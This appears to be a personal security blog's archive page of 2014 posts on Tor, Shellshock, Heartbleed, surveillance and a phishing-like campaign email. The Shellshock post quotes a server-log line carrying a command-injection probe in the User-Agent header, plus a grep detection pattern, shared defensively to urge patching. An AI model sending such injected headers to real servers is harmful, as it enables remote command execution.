Dec 13 2014

solidarity with the tor project

On Thursday 11 December, Roger Dingledine of the Tor project posted the following email to the “tor-talk” mail list (to which I am subscribed).

I’d like to draw your attention to

https://blog.torproject.org/blog/solidarity-against-online-harassment
https://twitter.com/torproject/status/543154161236586496

One of our colleagues has been the target of a sustained campaign of harassment for the past several months. We have decided to publish this statement to publicly declare our support for her, for every member of our organization, and for every member of our community who experiences this harassment. She is not alone and her experience has catalyzed us to action. This statement is a start.

Roger asked those who deplored on-line harassment (of any person, for any reason) and who supported the Tor project’s action in publicly condemning the harassment of one of the Tor developers to add their name and voice to the blog post.

I am proud to have done so.

Permanent link to this article: http://baldric.net/2014/12/13/solidarity-with-the-tor-project/

Nov 27 2014

independent hit

On trying to reach the website of the Independent newspaper today (the Grauniad is trying my patience of late), I received the following response:

Screenshot-www.independent.co.uk - Chromium

Closing the popup takes you to this page:

Screenshot-Hacked by SEA - Chromium

I haven’t checked whether this is simply a DNS redirect or an actual compromise of the Indy site, but however the graffiti was added, it indicates that the Indy has a problem.

Permanent link to this article: http://baldric.net/2014/11/27/independent-hit/

Sep 26 2014

CVE-2014-6271 bash vulnerability

Guess what I found in trivia’s logs this morning?

89.207.135.125 – - [25/Sep/2014:10:48:13 +0100] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0″ 404 345 “-” “() { :;}; /bin/ping -c 1 198.101.206.138″

I’ll bet a lot of cgi scripts are being poked at the moment.

Check your logs guys. A simple grep “:;}” access.log will tell you all you need to know.

(Update 27 September)

Digital Ocean, the company I use to host my Tor node and tails/whonix mirrors, has posted a useful note about the vulnerability. And John Leyden at El Reg posted about the problem here. Leyden’s article references some of the more authoritative discussions so I won’t repeat the links here.

All my systems were vulnerable, but of course have now been patched. However, the vulnerability has existed in bash for so long that I can’t help but feel deeply uneasy even though, as Michal Zalewski (aka lcamtuf) notes in his blog:

PS. As for the inevitable “why hasn’t this been noticed for 15 years” / “I bet the NSA knew about it” stuff – my take is that it’s a very unusual bug in a very obscure feature of a program that researchers don’t really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.

Permanent link to this article: http://baldric.net/2014/09/26/cve-2014-6271-bash-vulnerability/

Aug 13 2014

net neutrality

My apologies that this is a few weeks late – but it still bears posting. John Oliver at HBO gave the best description of the net neutrality argument I have seen so far.

Following that broadcast, the FCC servers were, rather predictably, overwhelmed by the outraged response from the trolls that Oliver set loose.

Unfortunately, as John Naughton reports in the Observer, the FCC are unlikely to be moved by that.

Permanent link to this article: http://baldric.net/2014/08/13/net-neutrality/

Aug 11 2014

levison on dime

Ladar Levison and Stephen Wyatt presented the upcoming Dark Internet Mail Environment (DIME) at Defcon22 this week. According to El Reg, Levison, who shut down Lavabit, his previous mail service rather than comply with FBI demands that he divulge the private SSL certificates used to encrypt traffic on that service, said:

“I’m not upset that I got railroaded and I had to shut down my business … I’m upset because we need a mil-spec cryptographic mail system for the entire planet just to be able to talk to our friends and family without any kind of fear of government surveillance”.

I think that puts the problem into perspective.

Permanent link to this article: http://baldric.net/2014/08/11/levison-on-dime/

Jul 28 2014

punctuation matters

There is a nice tweet over at @NSA_PR. It reads:

We take your privacy, seriously.

Beyond parody.

Permanent link to this article: http://baldric.net/2014/07/28/punctuation-matters/

Jul 23 2014

department of dirty

Like most ‘net users I get my fair share of spam. Most of it gets binned automatically by my email system, but of course some still gets through so I am used to hitting the delete button on random email from .ru domains offering me the opportunity to “impress my girl tonight”.

Most such phishing email relies on the recipient being dumb enough, naive enough, or (possibly) drunk enough to actually click through the link to the malicious website. I was therefore more than a little astonished at an email I received today from the open rights group. That email is given below in its entirety (I have obfuscated my email address for obvious reasons).

From: Department of Dirty
To: xxxxxxxx@yyy.zzz
Subject: Cleaning up the Internet
Date: Wed, 23 Jul 2014 07:14:18 -0400 (EDT)

Dear Mick,

Ever thought the internet was just too big? Want to help clean up online filth?

*Welcome to the Department of Dirty*

Watch the Department tackling its work here: www.departmentofdirty.co.uk and share our success, as we stop one man try to get one over us with his ‘spotted dick recipe’:

Department of Dirty Video: http://www.departmentofdirty.co.uk/

The Department of Dirty is working with internet and mobile companies to stop the dirty internet. We are committed to protecting children and adults from online filth such as:

*Talk to Frank: This government website tries to educate young people about drugs. We all know what ‘education’ means, don’t we? Blocked by Three.
*Girl Guides Essex:
They say, ‘guiding is about acquiring skills for life’. We say, why would young girls need skills? Blocked by BT.
*South London Refugee Association:
This charity aims to relieve poverty and distress. Not on our watch they don’t. Blocked by BT, EE, Sky and VirginMedia

This is just the tip of the iceberg.

We need you to help us take a stand against blogs, charities and education websites, all of which are being blocked [1]. It’s time to stop this sick filth. Together, we can clean up the internet.

http://www.departmentofdirty.co.uk

Sincerely,

Your Department of Dirty representative

[1] You can find out what we’re blocking at this convenient website: https://www.blocked.org.uk/

[DISCLAIMER] This email has come from the Open Rights Group. This email was delivered to: xxxxxxxx@yyy.zzz If you wish to opt out of future emails, you can do so here.

Now, I’m an ORG supporter (i.e. I am a paying member) and I am sure that someone, somewhere in ORG thought that this email campaign was a great idea. After all, it follows up the ORG’s earlier research on the fairly obvious stupidities arising from the implementation of Dave’s anti-porn campaign, it looks “ironic”, and it uses a snappy domain name which has shades of Monty Python about it. But I’m sorry, in my view this most certainly is not a good idea and I’m sure that ORG will come to regret it.

One of the most fundamental pieces of advice any and every ‘net user is beaten up with is “do not click on links in unsolicited emails”. In particular, the advice normally goes on – “if that email is from an unknown source, or has in any way a supicious from address you should immediately bin it”.

This email comes from an unknown address with a wonderfully prurient domain name. Even if it is successful and gets to the intended email inbox [1], it then relies on the recipient breaking a fundamental security rule. It does this by encouraging him (this looks to be male targeted) to click on a link which the naive might believe leads to a porn video.

How exactly is that going to help?

([1] Note. It got to my email inbox because the email system at e-activist.com which sent it is allowed by my filters.)

Permanent link to this article: http://baldric.net/2014/07/23/department-of-dirty/

Jul 21 2014

drip

I get my domestic ADSL connectivity from the rather excellent people at Andrews and Arnold.

Here’s why. And this is the original reason I moved to them.

They also happily take (and similarly reply to) GPG encrypted support questions.

Good guys. Thoroughly recommended.

Now can you /really/ see BT doing any of that?

‘thought not.

Permanent link to this article: http://baldric.net/2014/07/21/drip/

Jun 30 2014

inappropriate use of technology

I have been travelling a lot over the last few months (Czech Republic, Scotland, France, Germany, Austria, Slovenia, Croatia, Italy). That travel, plus my catching up on a load of reading is my excuse for the woeful lack of posts to trivia of late. But hey, sometimes life gets in the way of blogging – which is as it should be.

A couple of things struck me whilst I have been away though. Firstly, and most bizarrely I noticed a significant number of tourists in popular, and hugely photogenic, locations (such as Prague and Dubrovnik) wandering around staring at their smartphones rather than looking at the reality around them. At first I thought that they were just checking photographs they had taken, or possibly that they were texting or emailing friends and relatives about their holidays, or worse, posting to facebook, but that did not appear to be the case. Then by chance I overheard one tourist telling his partner that they needed to “turn left ahead” whilst they walked past me so it struck me that they might just possibly be using google maps to navigate. So I watched others more carefully. And I must conclude that many people were doing just that. I can’t help but feel a little saddened that someone should choose to stare at a google app on a small screen in their hand than look at the beauty of something like the Charles Bridge across the Vlatva.

The second point which struck me was how much of a muppet you look if you use an iPad to take photographs.

Permanent link to this article: http://baldric.net/2014/06/30/inappropriate-use-of-technology/

May 30 2014

a new app

My newspaper of choice, the Guardian, has for some time produced its own android (and iOS of course) app. I have often used the android app on my tablet to catch up on emerging news items at the end of the day. I also read the BBC news app for the same reason. Yesterday I received an update to the Guardian app. That update was a complete rewrite and gives the user a very different experience to the original app. For example, in the old app I could tailor the home screen to show me just the news categories I wanted (i.e. no sport, no fashion, but plenty of politics, business and UK news). In the new app I can only do that if I subscribe to a paid version. Sorrry, but no, I already pay for the newspaper, I just want this to give me updated headlines, I don’t want to have to buy the newspaper all over again.

In today’s paper (and on-line of course) there is an editorial comment on the new app explaining its background. The writer opens:

Today I am proud to announce the launch of our redesigned Guardian app. It’s been a ground-up reworking to bring you a new, advanced and beautiful Guardian app. For the first time you will have a seamless experience across phones and tablets, with a cleaner, responsive design that showcases the Guardian’s award-winning journalism to our readers around the world.

The article goes on to explain the history of the original app and the thinking behind the redesign. It continues:

We’re also thrilled to announce that GuardianWitness – the Guardian’s award-winning platform through which readers can contribute their own pictures, videos and text – is now integrated into the app, meaning readers can now contribute to assignments seamlessly and directly within the main app.

Hmmmm.

It continues:

Other new features include:

  • A new flexible layout so we can display different stories in different ways, and show readers which stories are the most important in one glance
  • Breaking news and sport alerts and up-to-the-minute live coverage
  • Increased personalisation: readers can personalise their home screen depending on what topics they’re most interested in, and create notifications to follow favourite writers, stories, series and football teams
  • Improved photo galleries and inclusion of interactives for the first time
  • Off-line reading – with intelligent caching readers will now be able to save articles to read later and have more content at their fingertips wherever they are
  • Open journalism has been built into the app, with even easier ways for readers to contribute comments, videos, photos via our new GuardianWitness integration, as well as a better commenting experience
  • New opportunities for advertisers.

I particularly like that last bit.

And of course the app needs access to my location.

Right.

(P.S. The app called “UK Newspapers” by Markus Reitberger gives access to all the UK news sites you could want – and all it asks for is network access.)

Permanent link to this article: http://baldric.net/2014/05/30/a-new-app/

Apr 16 2014

nsa operation orchestra

In February of this year, Poul-Henning Kamp (a.k.a “PHK”) gave what now looks to be a peculiarly prescient presentation as the closing keynote to 2014′s FOSDEM.

In the presentation (PDF), PHK posits an NSA operation called ORCHESTRA which is designed to undermine internet security through a series of “disinformation” or “misinformation”, or “misdirection” sub operations. ORCHESTRA is intended to be cheap, non-technical, completely deniable, but effective. One of the opening slides gives ORCHESTRA’s “operation at a glance” overview as:

* Objective:
- Reduce cost of COMINT collection
* Scope:
- All above board
- No special authorizations
* Means:
- Eliminate/reduce/prevent encryption
- Enable access
- Frustrate players

PHK delivers the presentation as if he were a mid-ranking NSA staffer intending to brief NATO in Brussels. But “being American, he ends up [at FOSDEM] instead”. The truly scary part of this presentation is that it could all be completely true.

What makes the presentation so timely is his commentary on openssl. Watch it and weep.

Permanent link to this article: http://baldric.net/2014/04/16/nsa-operation-orchestra/

Apr 16 2014

more heartbleed

For any readers uncertain of exactly how the heartbleed vulberability in openssl might be exploitable, Sean Cassidy over at existential type has a good explanation.

And if you find that difficult to follow, Randall Munroe over at xkcd covers it quite nicely.

heartbleed_explanation

My thanks, and appreciation as always, to a great artist.

Of course, Randall foresaw this problem back in 2008 when he published his take on the debian openssl fiasco.

Permanent link to this article: http://baldric.net/2014/04/16/more-heartbleed/

Older posts «